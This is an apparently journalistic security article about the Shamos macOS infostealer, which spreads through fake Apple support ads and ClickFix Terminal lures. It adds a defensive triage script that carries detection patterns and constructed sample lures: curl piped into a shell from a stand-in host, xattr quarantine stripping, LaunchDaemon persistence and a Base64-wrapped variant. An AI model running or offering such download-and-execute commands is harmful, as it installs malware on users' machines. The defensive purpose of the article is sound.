A new malware campaign targeting Mac users has been uncovered, and it is using fake Apple support ads to deliver Shamos, an infostealer from the Atomic Stealer (AMOS) family. According to security researchers, more than 300 attempts to install Shamos were detected between June and August 2025. The campaign, attributed to a criminal group tracked as Cookie Spider, is a stark reminder of the risks lurking behind an ordinary web search.
Rather than relying on traditional phishing emails, the attackers used malvertising. By purchasing paid search ads, they steered users who were searching for simple technical fixes, such as how to flush the DNS cache, to fraudulent Apple support websites. Getting the victim to paste a "fix" into a terminal is the technique commonly known as ClickFix.
How the Attack Unfolded
Once on these fake sites, users were prompted to enter a command into the macOS Terminal. The command appeared to be a harmless fix, but in reality it fetched and ran the malware. Because the user runs the command directly in a shell, the payload is downloaded by curl rather than by a browser and never receives the com.apple.quarantine attribute that triggers Gatekeeper's checks, so Gatekeeper never gets a say; installers of this kind also commonly strip the attribute explicitly with xattr. The command was sometimes displayed in plain text, while other times the real payload was wrapped in Base64 so that the user could not read what the one-liner would actually do.
Regardless of the format, the result was the installation of Shamos, which stole sensitive information such as browser data, Apple Keychain entries, Notes, and cryptocurrency wallets. Once collected, the data was compressed into a zip file and exfiltrated with curl, which ships with macOS, so the attackers needed to drop no extra tooling for the upload.
In some cases the malware also deployed a fake Ledger Live app and included a botnet module, expanding its reach even further. For persistence, Shamos wrote a launch daemon property list into the LaunchDaemons directory, and to frustrate analysis it checked whether it was running inside a virtual machine or sandbox before executing.
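The one thing a practitioner can do at the moment a page says "paste this into Terminal" is to read the command before running it. The following script is an added example, not code from the article or from the researchers it cites: it decodes any embedded Base64 blob and counts the patterns that characterise the lure described above (curl piped into a shell, quarantine stripping with xattr, Base64 self-decoding, LaunchDaemon persistence, osascript prompts). The hostnames, file paths and sample one-liners are constructed for this example, and the scoring is a heuristic, not a verdict.

```shell
#!/bin/sh
# Added example (not from the article or the cited research): triage a pasted
# "support fix" one-liner before executing it. Heuristic only; a score of 0 is
# not proof of safety. Sample hosts and paths below are constructed.

# Print the decoded payload if the command carries a Base64 blob (24+ chars);
# otherwise print the command unchanged.
decode_payload() {
    blob=$(printf '%s' "$1" | grep -oE '[A-Za-z0-9+/]{24,}={0,2}' | head -n 1)
    if [ -n "$blob" ] && decoded=$(printf '%s' "$blob" | base64 --decode 2>/dev/null); then
        printf '%s\n' "$decoded"
    else
        printf '%s\n' "$1"
    fi
}

# Print the number of distinct red-flag patterns found in the command and in
# its decoded payload (0 means nothing matched).
score_command() {
    combined=$(printf '%s\n%s' "$1" "$(decode_payload "$1")")
    hits=0
    for pat in \
        'curl[^|]*[|][[:space:]]*(/bin/|/usr/bin/)?(ba|z)?sh([^a-z]|$)' \
        'xattr[[:space:]]+-[cdr]' \
        'base64[[:space:]]+(-d|-D|--decode)' \
        '/Library/LaunchDaemons/' \
        'osascript'; do
        if printf '%s\n' "$combined" | grep -qE "$pat"; then
            hits=$((hits + 1))
        fi
    done
    echo "$hits"
}

# Constructed samples: Apple's documented DNS flush, a plain-text lure, and a
# Base64-wrapped lure built here from a hypothetical inner script.
BENIGN_FLUSH='sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder'
MALICIOUS_PLAIN='curl -fsSL http://fix.support-example.invalid/dns.sh | bash'
INNER='curl -fsSL http://fix.support-example.invalid/update.sh | sh
xattr -c /tmp/update
cp /tmp/update.plist /Library/LaunchDaemons/com.example.update.plist'
MALICIOUS_B64="echo $(printf '%s' "$INNER" | base64 | tr -d '\n') | base64 -d | sh"

for sample in "$BENIGN_FLUSH" "$MALICIOUS_PLAIN" "$MALICIOUS_B64"; do
    printf 'score=%s  %.60s...\n' "$(score_command "$sample")" "$sample"
done
```

Usage: pass the pasted command as a single quoted argument, for example score_command 'echo ... | base64 -d | sh'. The Base64-wrapped sample scores higher than the plain one precisely because decoding exposes the download, the xattr call and the LaunchDaemons write that the wrapper hides; that decoded text is what you should read before deciding whether to run anything.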
Why the Attack Was Successful
This campaign's success came from combining technical trickery with social engineering. Users trusted what looked like official Apple support advice, and by buying search placement the attackers reached victims at the exact moment they wanted a fix, without needing suspicious emails or untrustworthy torrent sites.
The campaign also deliberately avoided infecting machines in Russia and other former Soviet states, a common practice among criminal groups that want to stay clear of local law enforcement.
How to Protect Yourself
Mac users should be cautious and vigilant. Never paste a Terminal command from an unverified source, and treat any "fix" that contains a Base64 blob, pipes curl into a shell, or strips quarantine flags with xattr as hostile until you have decoded and read every line of it. Rely on official Apple documentation or well-known, trusted forums for technical advice instead.
To reduce the risk of malware, only install apps from the Mac App Store or from verified developer websites, and keep macOS current with the latest security patches. If you suspect a one-liner has already been run, review the contents of the LaunchDaemons and LaunchAgents directories for unfamiliar property lists and rotate any credentials stored in the Keychain.
For extra protection, security software such as CrowdStrike Falcon can detect and block malicious scripts in real time. The most effective defense, however, is a healthy dose of skepticism: a few extra minutes spent verifying instructions can save you from major data theft.